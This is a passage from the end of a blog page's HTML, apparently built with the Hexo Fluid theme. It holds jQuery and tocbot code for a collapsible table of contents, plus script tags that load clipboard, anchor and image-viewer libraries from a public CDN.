          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
